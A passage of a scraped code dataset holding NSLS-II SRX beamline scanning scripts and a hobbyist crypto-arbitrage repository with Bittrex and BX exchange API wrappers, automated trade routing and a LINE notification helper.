"text": "print(f'Loading {__file__}...')\n\ndef ssa_hcen_scan(start, stop, num, shutter=True):\n # Setup metadata\n scan_md = {}\n get_stock_md(scan_md)\n\n # Setup LiveCallbacks\n liveplotfig1 = plt.figure()\n liveplotx = 'h_cen_readback'\n liveploty = im.name\n livetableitem = ['h_cen_readback', im.name, i0.name]\n livecallbacks = [LiveTable(livetableitem),\n LivePlot(liveploty, x=liveplotx, fig=liveplotfig1)]\n\n # Setup the scan\n @subs_decorator(livecallbacks)\n def myscan():\n yield from scan([slt_ssa.h_cen, sclr1],\n slt_ssa.h_cen,\n start,\n stop,\n num,\n md=scan_md)\n\n # Record old position\n old_pos = slt_ssa.h_cen.position\n\n # Run the scan\n if (shutter):\n yield from mv(shut_b, 'Open')\n\n ret = yield from myscan()\n\n if (shutter):\n yield from mv(shut_b, 'Close')\n\n # Return to old position\n yield from mv(slt_ssa.h_cen, old_pos)\n\n return ret\n\ndef JJ_scan(motor, start, stop, num, shutter=True):\n # Setup metadata\n scan_md = {}\n get_stock_md(scan_md)\n\n # Setup LiveCallbacks\n liveplotfig1 = plt.figure()\n liveplotx = motor.name\n liveploty = im.name\n livetableitem = [motor.name, im.name, i0.name]\n livecallbacks = [LiveTable(livetableitem),\n LivePlot(liveploty, x=liveplotx, fig=liveplotfig1)]\n\n # Setup the scan\n @subs_decorator(livecallbacks)\n def myscan():\n yield from scan([motor, sclr1],\n motor,\n start,\n stop,\n num,\n md=scan_md)\n\n # Record old position\n old_pos = motor.position\n\n # Run the scan\n if (shutter):\n yield from mv(shut_b, 'Open')\n\n ret = yield from myscan()\n\n if (shutter):\n yield from mv(shut_b, 'Close')\n\n # Return to old position\n yield from mv(motor, old_pos)\n\n return ret\n\ndef slit_nanoKB_scan(slit_motor, sstart, sstop, sstep,\n edge_motor, estart, estop, estep, acqtime,\n shutter=True):\n \"\"\"\n Scan the beam defining slits (JJs) across the mirror.\n Perform a knife-edge scan at each position to check focal position.\n\n Parameters\n ----------\n slit_motor : motor\n slit motor that you want to scan\n sstart :\n \"\"\"\n\n scan_md = {}\n get_stock_md(scan_md)\n\n\n # calculate number of points\n snum = np.int(np.abs(np.round((sstop - sstart)/sstep)) + 1)\n enum = np.int(np.abs(np.round((estop - estart)/estep)) + 1)\n\n # Setup detectors\n dets = [sclr1, xs2]\n\n # Set counting time\n sclr1.preset_time.put(acqtime)\n xs2.external_trig.put(False)\n xs2.settings.acquire_time.put(acqtime)\n xs2.total_points.put(enum * snum)\n\n # LiveGrid\n livecallbacks = []\n roi_name = 'roi{:02}'.format(1)\n roi_key = getattr(xs2.channel1.rois, roi_name).value.name\n livecallbacks.append(LiveTable([slit_motor.name, edge_motor.name, roi_key]))\n livecallbacks.append(LivePlot(roi_key, x=edge_motor.name))\n # xlabel='Position [um]', ylabel='Intensity [cts]'))\n\n myplan = grid_scan(dets,\n slit_motor, sstart, sstop, snum,\n edge_motor, estart, estop, enum, False,\n md=scan_md)\n myplan = subs_wrapper(myplan,\n {'all': livecallbacks})\n\n # Open shutter\n if (shutter):\n yield from mv(shut_b,'Open')\n\n # grid scan\n uid = yield from myplan\n\n # Open shutter\n if (shutter):\n yield from mv(shut_b,'Close')\n\n return uid\n"
},
{
"alpha_fraction": 0.5958778262138367,
"alphanum_fraction": 0.6260581612586975,
"avg_line_length": 36.21917724609375,
"blob_id": "f8298fdbd980c0c8140f3ce2444b455da3f38969",
"content_id": "df26baabcd374d15235460aea3aed28326228267",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2717,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 73,
"path": "/startup/16-nanoES.py",
"repo_name": "mrakitin/profile_collection-srx",
"src_encoding": "UTF-8",
"text": "print(f'Loading {__file__}...')\n\n\nfrom ophyd import (Device, EpicsMotor, EpicsSignal, EpicsSignalRO,\n PVPositionerPC)\nfrom ophyd import Component as Cpt\n\n\n# nano-KB mirrors\nclass SRXNanoKBFine(PVPositionerPC):\n setpoint = Cpt(EpicsSignal, 'SPOS') # XF:05IDD-ES:1{Mir:nKBv-Ax:PC}SPOS\n readback = Cpt(EpicsSignalRO, 'RPOS') # XF:05IDD-ES:1{Mir:nKBh-Ax:PC}RPOS\n\n\nclass SRXNanoKB(Device):\n # XF:05IDD-ES:1{nKB:vert-Ax:Y}Mtr.RBV\n v_y = Cpt(EpicsMotor, 'vert-Ax:Y}Mtr')\n # XF:05IDD-ES:1{nKB:vert-Ax:PC}RPOS\n v_pitch = Cpt(SRXNanoKBFine,\n 'XF:05IDD-ES:1{nKB:vert-Ax:PC}',\n name='nanoKB_v_pitch',\n add_prefix=()) \n # XF:05IDD-ES:1{nKB:horz-Ax:PC}Mtr.RBV\n v_pitch_um = Cpt(EpicsMotor, 'horz-Ax:PC}Mtr')\n # XF:05IDD-ES:1{nKB:horz-Ax:X}Mtr.RBV\n h_x = Cpt(EpicsMotor, 'horz-Ax:X}Mtr')\n # XF:05IDD-ES:1{nKB:horz-Ax:PC}RPOS\n h_pitch = Cpt(SRXNanoKBFine,\n 'XF:05IDD-ES:1{nKB:horz-Ax:PC}',\n name='nanoKB_h_pitch',\n add_prefix=())\n # XF:05IDD-ES:1{nKB:vert-Ax:PC}Mtr.RBV\n h_pitch_um = Cpt(EpicsMotor, 'vert-Ax:PC}Mtr')\n\n\nnanoKB = SRXNanoKB('XF:05IDD-ES:1{nKB:', name='nanoKB')\n\n\n# High flux sample stages\nclass SRXNanoStage(Device):\n x = Cpt(EpicsMotor, 'sx}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:sx}Mtr.RBV\n y = Cpt(EpicsMotor, 'sy}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:sy}Mtr.RBV\n z = Cpt(EpicsMotor, 'sz}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:sz}Mtr.RBV\n sx = Cpt(EpicsMotor, 'ssx}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:ssx}Mtr.RBV\n sy = Cpt(EpicsMotor, 'ssy}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:ssy}Mtr.RBV\n sz = Cpt(EpicsMotor, 'ssz}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:ssz}Mtr.RBV\n th = Cpt(EpicsMotor, 'th}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:th}Mtr.RBV\n topx = Cpt(EpicsMotor, 'xth}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:xth}Mtr.RBV\n topz = Cpt(EpicsMotor, 'zth}Mtr') # XF:05IDD-ES:1{nKB:Smpl-Ax:zth}Mtr.RBV\n\n\nnano_stage = SRXNanoStage('XF:05IDD-ES:1{nKB:Smpl-Ax:', name='nano_stage')\n\n\n# SDD motion\nclass SRXNanoDet(Device):\n x = Cpt(EpicsMotor, 'X}Mtr') # XF:05IDD-ES:1{nKB:Det-Ax:X}Mtr.RBV\n y = Cpt(EpicsMotor, 'Y}Mtr') # XF:05IDD-ES:1{nKB:Det-Ax:Y}Mtr.RBV\n z = Cpt(EpicsMotor, 'Z}Mtr') # XF:05IDD-ES:1{nKB:Det-Ax:Z}Mtr.RBV\n\n\nnano_det = SRXNanoDet('XF:05IDD-ES:1{nKB:Det-Ax:', name='nano_det')\n\n\n# Lakeshore temperature monitors\nclass SRXNanoTemp(Device):\n temp_nanoKB_horz = Cpt(EpicsSignalRO, '2}T:C-I')\n temp_nanoKB_vert = Cpt(EpicsSignalRO, '1}T:C-I')\n temp_nanoKB_base = Cpt(EpicsSignalRO, '4}T:C-I')\n temp_microKB_base = Cpt(EpicsSignalRO, '3}T:C-I')\n\n\ntemp_nanoKB = SRXNanoTemp('XF:05IDD-ES{LS:1-Chan:', name='temp_nanoKB')\n"
},
{
"alpha_fraction": 0.5739745497703552,
"alphanum_fraction": 0.5765205025672913,
"avg_line_length": 37.846153259277344,
"blob_id": "0ced3ddd16d544cd982b1d4a993bafecb4228dbf",
"content_id": "a48dd4210d7fc5cf14ef703be0624b7a301e512c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3535,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 91,
"path": "/startup/01-liveplot-workaround.py",
"repo_name": "mrakitin/profile_collection-srx",
"src_encoding": "UTF-8",
"text": "from bluesky.callbacks.mpl_plotting import LivePlot, QtAwareCallback\nfrom functools import partial\nimport matplotlib.pyplot as plt\nimport threading\nfrom bluesky.callbacks.core import CallbackBase, get_obj_fields, make_class_safe\n\n\nclass HackLivePlot(LivePlot):\n \"\"\"\n Build a function that updates a plot from a stream of Events.\n\n Note: If your figure blocks the main thread when you are trying to\n scan with this callback, call `plt.ion()` in your IPython session.\n\n Parameters\n ----------\n y : str\n the name of a data field in an Event\n x : str, optional\n the name of a data field in an Event, or 'seq_num' or 'time'\n If None, use the Event's sequence number.\n Special case: If the Event's data includes a key named 'seq_num' or\n 'time', that takes precedence over the standard 'seq_num' and 'time'\n recorded in every Event.\n legend_keys : list, optional\n The list of keys to extract from the RunStart document and format\n in the legend of the plot. The legend will always show the\n scan_id followed by a colon (\"1: \"). Each\n xlim : tuple, optional\n passed to Axes.set_xlim\n ylim : tuple, optional\n passed to Axes.set_ylim\n ax : Axes, optional\n matplotib Axes; if none specified, new figure and axes are made.\n fig : Figure, optional\n deprecated: use ax instead\n epoch : {'run', 'unix'}, optional\n If 'run' t=0 is the time recorded in the RunStart document. If 'unix',\n t=0 is 1 Jan 1970 (\"the UNIX epoch\"). Default is 'run'.\n All additional keyword arguments are passed through to ``Axes.plot``.\n\n Examples\n --------\n >>> my_plotter = LivePlot('det', 'motor', legend_keys=['sample'])\n >>> RE(my_scan, my_plotter)\n \"\"\"\n def __init__(self, y, x=None, *, legend_keys=None, xlim=None, ylim=None,\n epoch='run', fig_factory=None, **kwargs):\n # don't use super to \"skip\" a level!\n QtAwareCallback.__init__(self, use_teleporter=kwargs.pop('use_teleporter', None))\n self.__setup_lock = threading.Lock()\n self.__setup_event = threading.Event()\n\n def setup():\n # Run this code in start() so that it runs on the correct thread.\n nonlocal y, x, legend_keys, xlim, ylim, epoch, kwargs\n import matplotlib.pyplot as plt\n with self.__setup_lock:\n if self.__setup_event.is_set():\n return\n self.__setup_event.set()\n if fig_factory is None:\n ax_factory = plt.subplots\n\n fig, ax = fig_factory()\n\n self.ax = ax\n\n if legend_keys is None:\n legend_keys = []\n self.legend_keys = ['scan_id'] + legend_keys\n if x is not None:\n self.x, *others = get_obj_fields([x])\n else:\n self.x = 'seq_num'\n self.y, *others = get_obj_fields([y])\n self.ax.set_ylabel(y)\n self.ax.set_xlabel(x or 'sequence #')\n if xlim is not None:\n self.ax.set_xlim(*xlim)\n if ylim is not None:\n self.ax.set_ylim(*ylim)\n self.ax.margins(.1)\n self.kwargs = kwargs\n self.lines = []\n self.legend = None\n self.legend_title = \" :: \".join([name for name in self.legend_keys])\n self._epoch_offset = None # used if x == 'time'\n self._epoch = epoch\n\n self._LivePlot__setup = setup\n"
},
{
"alpha_fraction": 0.6230088472366333,
"alphanum_fraction": 0.6247787475585938,
"avg_line_length": 24.393259048461914,
"blob_id": "b0fb3479c7bb7d1c9b613599ecf3bdb535a0c561",
"content_id": "fd4ed3c69046c4d642206e5e3bd96c966d41105b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2260,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 89,
"path": "/startup/00-base.py",
"repo_name": "mrakitin/profile_collection-srx",
"src_encoding": "UTF-8",
"text": "print(f\"Loading {__file__}...\")\n\nimport nslsii\nimport matplotlib as mpl\nfrom IPython.terminal.prompts import Prompts, Token\n\n\nclass SRXPrompt(Prompts):\n def in_prompt_tokens(self, cli=None):\n return [\n (Token.Prompt, \"BlueSky@SRX [\"),\n (Token.PromptNum, str(self.shell.execution_count)),\n (Token.Prompt, \"]: \"),\n ]\n\n\nip = get_ipython()\nnslsii.configure_base(ip.user_ns, \"srx\")\nnslsii.configure_olog(ip.user_ns)\nip.prompts = SRXPrompt(ip)\n\n\n# Optional: set any metadata that rarely changes.\nRE.md[\"beamline_id\"] = \"SRX\"\n\n\n# Custom Matplotlib configs:\nmpl.rcParams[\"axes.grid\"] = True # grid always on\n\n\n# Comment it out to enable BEC table:\nbec.disable_table()\n\n\n# Disable BestEffortCallback to plot ring current\nbec.disable_plots()\n\n\n# Temporary fix before it's fixed in ophyd\nimport logging\nlogger = logging.getLogger('ophyd')\nlogger.setLevel('WARNING')\n\nfrom pathlib import Path\n\nimport appdirs\n\n\ntry:\n from bluesky.utils import PersistentDict\nexcept ImportError:\n import msgpack\n import msgpack_numpy\n import zict\n\n class PersistentDict(zict.Func):\n def __init__(self, directory):\n self._directory = directory\n self._file = zict.File(directory)\n super().__init__(self._dump, self._load, self._file)\n\n @property\n def directory(self):\n return self._directory\n\n def __repr__(self):\n return f\"<{self.__class__.__name__} {dict(self)!r}>\"\n\n @staticmethod\n def _dump(obj):\n \"Encode as msgpack using numpy-aware encoder.\"\n # See https://github.com/msgpack/msgpack-python#string-and-binary-type\n # for more on use_bin_type.\n return msgpack.packb(\n obj,\n default=msgpack_numpy.encode,\n use_bin_type=True)\n\n @staticmethod\n def _load(file):\n return msgpack.unpackb(\n file,\n object_hook=msgpack_numpy.decode,\n raw=False)\n\n# runengine_metadata_dir = appdirs.user_data_dir(appname=\"bluesky\") / Path(\"runengine-metadata\")\nrunengine_metadata_dir = Path('/nsls2/xf05id1/shared/config/runengine-metadata')\n\nRE.md = PersistentDict(runengine_metadata_dir)\n"
}
] | 5 |
layel2/crypto-arbitrage
|
https://github.com/layel2/crypto-arbitrage
|
c6aba9de1c2218fc9db127c97a92c5a46da6ff9f
|
bbae84d737bb049513dfe8f20695d6e3722cda40
|
106a681b370b074e7ac07dd067fc94e8733098a3
|
refs/heads/master
| 2022-11-28T00:29:02.181343 | 2020-08-02T17:28:37 | 2020-08-02T17:28:37 | 284,482,525 | 0 | 2 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6665029525756836,
"alphanum_fraction": 0.6797642707824707,
"avg_line_length": 36.71296310424805,
"blob_id": "965abaadcda19e9fbf96f7efa46c242926e1f121",
"content_id": "9f3fc98012166777f09997fe71891ef84a4954f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4072,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 108,
"path": "/bittrexapi.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\nimport hashlib\nimport time\nimport hmac\n\nkey = \"\"\nsecret = \"\"\n\n\ndef createOrder(pairing,tradeType,amount,rate): #type buy or sell\n\tpairing=DOGcheck(pairing)\n\tnonce = str(time.time())\n\tif(tradeType=='buy'):\n\t\tamount = amount/rate\n\n\tamount = amount*0.99\n\turl = \"https://api.bittrex.com/api/v1.1/market/\"+tradeType+\"limit?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"&market=\"+pairing+\"&quantity=\"+str(amount)+\"&rate=\"+str(rate)\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()\n\ndef getBalance(currency):\n\tcurrency=DOGcheck(currency)\n\tnonce = str(time.time())\n\turl = \"https://api.bittrex.com/api/v1.1/account/getbalance?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"¤cy=\"+currency\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()['result']['Balance']\n\ndef getDepositAddr(currency):\n\tcurrency=DOGcheck(currency)\n\tnonce = str(time.time())\n\turl = \"https://api.bittrex.com/api/v1.1/account/getdepositaddress?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"¤cy=\"+currency\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()\n\ndef withdraw(currency,amount,addr,payId=None):\n\tcurrency=DOGcheck(currency)\n\tnonce = str(time.time())\n\turl = \"https://api.bittrex.com/api/v1.1/account/withdraw?\"\n\tif(currency == 'XRP' and (payId!=None) ):\n\t\turl = \turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"¤cy=\"+currency+\"&quantity=\"+str(amount)+\"&address=\"+addr.split('?dt=')[0]+\"&paymentid=\"+addr.split('?dt=')[1]\n\telse:\n\t\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"¤cy=\"+currency+\"&quantity=\"+str(amount)+\"&address=\"+addr\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()\n\ndef orderHistory(pairing):\n\tpairing=DOGcheck(pairing)\n\tnonce = str(time.time())\n\turl = \"https://api.bittrex.com/api/v1.1/account/getorderhistory?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"&market=\"+pairing\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()\n\ndef getPrice(pairing,tradeType):\n\tpairing=DOGcheck(pairing)\n\tnonce = str(time.time())\n\turl = \"https://api.bittrex.com/api/v1.1/public/getorderbook?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"&market=\"+pairing+\"&type=\"+tradeType\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()['result'][0]['Rate'] , r.json()['result'][0]['Quantity']\n\ndef DOGcheck(pairing):\n\ttempPair = pairing.split('-')\n\tif(len(tempPair) == 1):\n\t\tif(pairing == 'DOG'):\n\t\t\tpairing = 'DOGE'\n\telif(len(tempPair) == 2):\n\t\tif(tempPair[0] == 'DOG'):\n\t\t\ttempPair[0] = 'DOGE'\n\t\t\tpairing = '%s-%s'%(tempPair[0],tempPair[1])\n\t\telif(tempPair[1] == 'DOG'):\n\t\t\ttempPair[1] = 'DOGE'\n\t\t\tpairing = '%s-%s'%(tempPair[0],tempPair[1])\n\treturn pairing\ndef pairCheck(pairing):\n\tpairing=DOGcheck(pairing)\n\tnonce = str(time.time())\n\turl = 
\"https://api.bittrex.com/api/v1.1/public/getticker?\"\n\turl = url+\"apikey=\"+key+\"&nonce=\"+nonce+\"&market=\"+pairing\n\tsignature = hmac.new(secret.encode('ASCII'),url.encode('ASCII'),hashlib.sha512).hexdigest()\n\tr=requests.get(url,headers={'apisign':signature})\n\treturn r.json()['success']\n\n#a = orderHistory('BTC-BSV')\n#print(a)\n'''bx_sent_cur = ['BTC','ETH','REP','BCH','BSV','XCN','DAS','DOG','EOS','EVX','FTC','GNO','HYP','LTC','NMC','OMG','PND','XPY','PPC','POW','XPM','XRP','ZEC','XZC','ZMN']\nfor i in bx_sent_cur:\n\tprint(getDepostiAddr(i))'''\n\n#print(getPrice('BTC-XRP','sell'))\n#print(type(getBalance('BTC')))\n#print(createOrder('ETH-DOGE','buy',1,1))\n#print(DOGcheck('DOG'))\n#print(getDepositAddr('BSV'))\n\n'''a=getBalance('XRP')\nprint(a)\nprint(a == None)'''\n#print(pairCheck('XRP-BTC'))"
},
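Every private endpoint in bittrexapi.py repeats the same boilerplate: append apikey and nonce to the URL, sign the whole URL with HMAC-SHA512, and send the digest in an apisign header. A minimal sketch of that step factored into one helper, following the scheme the file itself uses; the helper name is illustrative.

import hashlib
import hmac
import time
import requests

def bittrex_signed_get(base_url, params, key, secret):
    # Bittrex v1.1 signing: HMAC-SHA512 over the full URL, hex-encoded,
    # sent in the 'apisign' header.
    query = dict(params, apikey=key, nonce=str(time.time()))
    url = base_url + '?' + '&'.join('%s=%s' % (k, v) for k, v in query.items())
    signature = hmac.new(secret.encode('ascii'), url.encode('ascii'),
                         hashlib.sha512).hexdigest()
    return requests.get(url, headers={'apisign': signature}).json()

For example, getBalance could reduce to bittrex_signed_get('https://api.bittrex.com/api/v1.1/account/getbalance', {'currency': currency}, key, secret)['result']['Balance'].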
{
"alpha_fraction": 0.6982455849647522,
"alphanum_fraction": 0.6982455849647522,
"avg_line_length": 30.66666603088379,
"blob_id": "0d1263866c1e2c3686527271ff9c68c30e1bee0e",
"content_id": "4756ffcafa0f67384c5af0cc0cb5250ea2632a6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 9,
"path": "/lineMsg.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\n\ndef sentLine(msg):\n\ttoken = \"\" #Line token\n\turl = \"https://notify-api.line.me/api/notify\"\n\theaders = {'content-type':'application/x-www-form-urlencoded','Authorization':'Bearer '+token}\n\t\n\tr=requests.post(url,headers = headers ,data = {'message':msg})\n\t#print(r.text)\n"
},
{
"alpha_fraction": 0.7047244310379028,
"alphanum_fraction": 0.712598443031311,
"avg_line_length": 22.045454025268555,
"blob_id": "32219087e0ebd4ec71ed5c869fd71bcc684e4119",
"content_id": "2e3f0673a5fc539dd2698eb0a81748c8ed5db482",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 22,
"path": "/call.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\nimport numpy as np\nfrom myFunc import *\nfrom autotrade import *\nfrom routeKucoin import *\n\nbx = getBx()\nbt = getBittrex()\n#kucoin = getKucoin()\n#okex = getOkex()\n#Route = getRoute2(bt,okex)\n#Route = getRoute3(bx,kucoin)\n#Route = getRoute4(bt,kucoin)\nRoute = getRoute(bx,bt)\n#print(Route)\nprint(Route.tradeRoute)\nprint(Route.profit)\n#print(len(Route.profit))\n#if(not Route.profit == []):\n#\tif(np.max(Route.profit) > 5):\n#\t\tprint(\"Trade!\")\n#\t\tTrade = routeTrade(Route.profit,Route.tradeRoute)\n\n"
},
{
"alpha_fraction": 0.6463841199874878,
"alphanum_fraction": 0.6632970571517944,
"avg_line_length": 28.06779670715332,
"blob_id": "3f3cc13fc9d43544abeb4bf47a14684f2f4591e1",
"content_id": "dc83340fc56925a21fa2cbdb14dc2f3da2eb8066",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5144,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 177,
"path": "/autotrade.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport bxapi\nimport bittrexapi\nimport time\nimport requests\n\ndef bxTrade(pairing):\n\ttradeA = pairing.split('-')[0]\n\ttradeB = pairing.split('-')[1]\n\tif(bxapi.getPairID(pairing) == None):\n\t\tpairing = \"%s-%s\"%(tradeB,tradeA)\n\t\ttradeType = 'sell'\n\telse:\n\t\ttradeType = 'buy'\n\tamount = bxapi.getBalance(tradeA)\n\tif(tradeType == 'buy'):\n\t\ttradeTypeCheck = 'sell'\n\telif(tradeType == 'sell'):\n\t\ttradeTypeCheck = 'buy'\n\trate,maxAm = bxapi.getPrice(pairing,tradeTypeCheck)\n\tbeforeTrade = bxapi.getBalance(tradeB)\n\torder = bxapi.createOrder(pairing,tradeType,amount,rate)\n\tprint(order)\n\tif(order['success'] == False):\n\t\tprint(\"error bxTrade()\")\n\t\tprint(order['error'])\n\t\texit()\n\n\twhile True:\n\t\ttime.sleep(10)\n\t\tafterTrade = bxapi.getBalance(tradeB)\n\t\tif(tradeType == 'buy'):\n\t\t\tif(float(afterTrade) > float(beforeTrade)+0.8*amount/rate):\n\t\t\t\tbreak;\n\t\telif(tradeType == 'sell'):\n\t\t\tif(float(afterTrade) > float(beforeTrade)+0.8*amount*rate):\n\t\t\t\tbreak;\n\t\telse:\n\t\t\tamount = bxapi.getBalance(tradeA)\n\t\t\trate,maxAm = bxapi.getPrice(pairing,tradeTypeCheck)\n\t\t\torder = bxapi.createOrder(pairing,tradeType,amount,rate)\n\t\t\tprint(order)\n\t\tpass\n\tprint('Success')\n\ndef bittrexTrade(pairing):\n\ttradeA = pairing.split('-')[0]\n\ttradeB = pairing.split('-')[1]\n\tallm = requests.get(\"https://api.bittrex.com/api/v1.1/public/getmarkets\").json()\n\tfor i in range(0,len(allm['result'])):\n\t\tif(allm['result'][i]['BaseCurrency']==tradeA and allm['result'][i]['MarketCurrency']==tradeB):\n\t\t\ttradePair = allm['result'][i]['MarketName']\n\t\t\ttradeType = 'buy'\n\t\telif(allm['result'][i]['BaseCurrency']==tradeB and allm['result'][i]['MarketCurrency']==tradeA):\n\t\t\ttradePair = allm['result'][i]['MarketName']\n\t\t\ttradeType = 'sell'\n\n\tamount = bittrexapi.getBalance(tradeA)\n\tif(tradeType == 'buy'):\n\t\ttradeTypeCheck = 'sell'\n\telif(tradeType == 'sell'):\n\t\ttradeTypeCheck = 'buy'\n\n\trate,maxAm = bittrexapi.getPrice(tradePair,tradeTypeCheck)\n\tbeforeTrade = bittrexapi.getBalance(tradeB)\n\tprint(pairing)\n\tprint(tradeType)\n\tprint(amount)\n\tprint(rate)\n\tprint(amount/rate)\n\torder = bittrexapi.createOrder(tradePair,tradeType,amount,rate)\n\tprint(order)\n\tif(order['success'] == False):\n\t\tprint(\"error bittrexTrade()\")\n\t\tprint(order['message'])\n\t\texit()\n\n\twhile True:\n\t\ttime.sleep(10)\n\t\tafterTrade = bittrexapi.getBalance(tradeB)\n\t\tif(tradeType == 'buy'):\n\t\t\tif(float(afterTrade) > float(beforeTrade)+0.8*amount/rate):\n\t\t\t\tbreak;\n\t\telif(tradeType == 'sell'):\n\t\t\tif(float(afterTrade) > float(beforeTrade)+0.8*amount*rate):\n\t\t\t\tbreak;\n\t\telse :\n\t\t\tamount = bittrexapi.getBalance(tradeA)\n\t\t\trate,maxAm = bittrexapi.getPrice(tradePair,tradeTypeCheck)\n\t\t\torder = bittrexapi.createOrder(tradePair,tradeType,amount,rate)\n\t\t\tprint(order)\n\t\tpass\n\tprint(\"Success\")\n\n\ndef routeTrade(profit,tradeRoute):\n maxR = np.argmax(profit)\n route = tradeRoute[maxR]\n print(\"Start Trade\")\n print(route)\n #---bx THB->A ----\n print(\"In Bx Trading\")\n bxTrade(route[0])\n print(\"In Bx Trade Success\")\n #--- bx->bittrex ---\n print(\"Sending to bittrex\")\n sendCur1 = route[0].split('-')[1]\n print(sendCur1)\n sendAmount1 = bxapi.getBalance(sendCur1)\n sendA1 = bittrexapi.getDepositAddr(sendCur1)\n if(sendA1['success'] == False):\n \texit()\n sendAddr1 = sendA1['result']['Address']\n if(sendCur1 == 'XRP'):\n \tsendAddr1 = '' #xrp 
addr\n #print(sendAddr1)\n beforeSend1 = bittrexapi.getBalance(sendCur1)\n tran1 = bxapi.withdraw(sendCur1,sendAmount1,sendAddr1)\n print(tran1)\n if(tran1['success'] == False):\n \tprint('Trans1 error')\n \tprint(tran1['error'])\n \texit()\n while True:\n \ttime.sleep(90)\n \tafterSend1 = bittrexapi.getBalance(sendCur1)\n \tif(afterSend1 == None or beforeSend1 == None):\n \t\tif(afterSend1 != None):\n \t\t\tbreak;\n \telif(afterSend1 > beforeSend1):\n \t\tbreak;\n \tpass\n print('Now at bittrex')\n #----@bittrex B/A\n print(\"In Bittrex Trading\")\n bittrexTrade(route[1])\n print(\"In Bittrex Trade Success\")\n #----@bittrex B/C\n print(\"In Bittrex Trading\")\n bittrexTrade(route[2])\n print(\"In Bittrex Trade Success\")\n #send back to bx\n sendCur2 = route[2].split('-')[1]\n sendAmount2 = bittrexapi.getBalance(sendCur2)\n '''sendA2 = bxapi.getDepositAddr2(sendCur2)\n if(sendA2['success'] == False):\n \texit()'''\n sendAddr2 = bxapi.getDepositAddr2(sendCur2)\n beforeSend2 = bxapi.getBalance(sendCur2)\n print(\"Sending to Bx\")\n tran2 = bittrexapi.withdraw(sendCur2,sendAmount2,sendAddr2)\n print(tran2)\n if(tran2['success']==False):\n \tprint('trans 2 error')\n \tprint(tran2['message'])\n \texit()\n while True:\n \ttime.sleep(90)\n \tafterSend2 = bxapi.getBalance(sendCur2)\n \tif(afterSend2 > beforeSend2):\n \t\tbreak;\n \tpass\n print(\"Now at Bx\")\n #BX trade back to thb\n print(\"In Bx Trading\")\n bxTrade(route[3])\n print(\"In Bx Trade Success\")\n print(\"In Bx Trading\")\n bxTrade(route[4])\n print(\"In Bx Trade Success\")\n print(\"Program Trade Complete\")\n return \"Trade Complete\"\n\n#profit = [0,2]\n#tradeRoute = [[],['THB-GNO','GNO-BTC','BTC-DOG','DOG-BTC','BTC-THB']]\n#routeTrade(profit,tradeRoute)\n#bittrexTrade(\"BTC-FTC\")"
},
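The trade and transfer routines above all share one pattern: poll a balance every 10 or 90 seconds in an unbounded while True until a fill or deposit shows up. A sketch of that pattern with a deadline, so a lost transfer fails loudly instead of hanging forever; the helper name and timeout value are illustrative.

import time

def wait_for_balance_increase(get_balance, baseline, poll_seconds=90, timeout_seconds=3600):
    # Poll until the balance rises above the baseline, or give up at the deadline.
    # A None baseline mirrors the original code: accept the first non-None reading.
    deadline = time.time() + timeout_seconds
    while time.time() < deadline:
        balance = get_balance()
        if balance is not None and (baseline is None or balance > baseline):
            return balance
        time.sleep(poll_seconds)
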